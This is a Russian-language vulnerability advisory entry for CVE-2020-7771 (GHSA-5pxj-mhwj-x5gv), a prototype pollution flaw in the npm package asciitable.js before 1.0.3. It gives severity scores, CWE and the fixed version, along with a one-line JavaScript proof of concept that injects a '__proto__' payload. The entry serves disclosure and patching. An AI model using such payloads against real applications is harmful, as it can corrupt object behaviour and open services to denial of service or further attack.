exploitDog

GHSA-5pxj-mhwj-x5gv

Опубликовано: 13 апр. 2021

Источник: github

Github: Прошло ревью

CVSS3: 9.8

Описание

Prototype Pollution in asciitable.js

The package asciitable.js before 1.0.3 is vulnerable to Prototype Pollution via the main function.

PoC

var a = require("asciitable.js"); var b = JSON.parse('{"__proto__":{"test":123}}'); a({},b); console.log({}.test)

Ссылки

Пакеты

Наименование

asciitable.js

npm

Затронутые версииВерсия исправления

< 1.0.3

1.0.3

EPSS

Процентиль: 63%

0.00448

Низкий

9.8 Critical

CVSS3

CVE ID

Дефекты

CWE-400

Связанные уязвимости

CVE-2020-7771

CVSS3: 7.5

nvd

около 5 лет назад

The package asciitable.js before 1.0.3 are vulnerable to Prototype Pollution via the main function.

EPSS

Процентиль: 63%

0.00448

Низкий

9.8 Critical

CVSS3

CVE ID

Дефекты

CWE-400